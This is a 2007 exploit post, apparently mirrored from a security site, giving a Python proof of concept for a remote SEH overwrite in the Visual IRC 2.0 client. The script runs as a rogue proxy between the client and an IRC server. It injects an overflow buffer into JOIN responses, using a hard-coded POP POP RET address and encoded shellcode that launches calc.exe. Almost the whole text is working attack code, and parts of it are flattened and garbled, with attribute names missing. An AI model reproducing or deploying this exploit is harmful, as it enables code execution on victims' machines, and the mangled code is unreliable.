ViRC 2.0 (JOIN Response) Remote SEH Overwrite Exploit 0day
来源 作者:Krystian 发布时间:2007-07-06
#!/usr/bin/python # ViRC 2.0 'JOIN Response' 0day Remote SEH Overwrite PoC Exploit # Bug discovered by Krystian Kloskowski (h07) <> # Tested on Visual IRC 2.0 / 2k SP4 Polish # Shellcode type: Windows Execute Command (calc.exe) # How stuff works ? .. # # [ViRC] -----> (..JOIN..) -------------> [exploit_tunnel] -----------------------------> [Real IRC server] # [ViRC] <--- (#channel :AAAAAAA...) <--- [exploit_tunnel] <---- (#channel :nick) <------ [Real IRC server] # # Details: # "#channel :" + "A" * 4116 # 0x41414141 Pointer to next SEH record # 0x41414141 SE handler ##
from thread import start_new_thread from struct import pack from string import find from string import join from socket import *
LEN_RECV = 65536
in_addr = '' # local address in_port = 6667 # local port out_addr = '' # address of IRC server out_port = 6667 # port of IRC server
shellcode = ( "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")
NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06 SE_HANDLER = 0x7CEA41D3 # POP POP RET (SHELL32.DLL / 2k SP4 Polish)
buf = "A" * 4108 buf += pack("<L", NEXT_SEH_RECORD) buf += pack("<L", SE_HANDLER) buf += "\x90" * 32 buf += shellcode
class new_plug_in: def __init__(self): self.sock = 0 self.send_to = 1 = 1 self.plugins = [] self.description = ''
def CloseTunnel(self): if( == 1): = 0 self.sock.shutdown(1) self.sock.close() self.plugins[self.send_to].active = 0 self.plugins[self.send_to].sock.shutdown(1) self.plugins[self.send_to].sock.close()
def Send(self, data): try: self.sock.send(data) except: self.CloseTunnel()
def Recv(self): while(1): try: data = self.sock.recv(LEN_RECV) if(len(data) == 0): self.CloseTunnel() return print self.description print data if(self.description == '[SERVER]'): if(find(data, 'JOIN') != -1): data = build_evil_buf(data, buf) if(data == -1): print "Error: Malformed IRC response" self.CloseTunnel() self.plugins[self.send_to].Send(data) except: self.CloseTunnel() return
def Run(self): if(len(self.plugins) == 0): self.plugins.append(self) try: s = socket(AF_INET, SOCK_STREAM) s.connect((out_addr, out_port)) except: s.close() self.sock.close() return tunnel_out = new_plug_in() tunnel_out.sock = s tunnel_out.send_to = 0 self.plugins.append(tunnel_out) self.description = '[CLIENT]' tunnel_out.description = '[SERVER]' tunnel_out.plugins = self.plugins tunnel_out.Run() start_new_thread(self.Recv, ())
def build_evil_buf(data, buf): try: lines = data.split('\r\n') tmp = lines[1].split('\x20:') tmp[1] = buf lines[1] = join(tmp, "\x20:") return join(lines, "\r\n") except: return -1
def AcceptConnect(cl, addr): print "Connection accepted from: %s" % (addr[0]) tunnel_in = new_plug_in() tunnel_in.sock = cl tunnel_in.Run()
def InitServer(bind_addr, bind_port): s = socket(AF_INET, SOCK_STREAM) s.bind((bind_addr, bind_port)) print "Listening on %s:%d..." % (bind_addr, bind_port) s.listen(1) while(1): cl, addr = s.accept() start_new_thread(AcceptConnect, (cl, addr,)) s.close()
InitServer(in_addr, in_port)
# EoF
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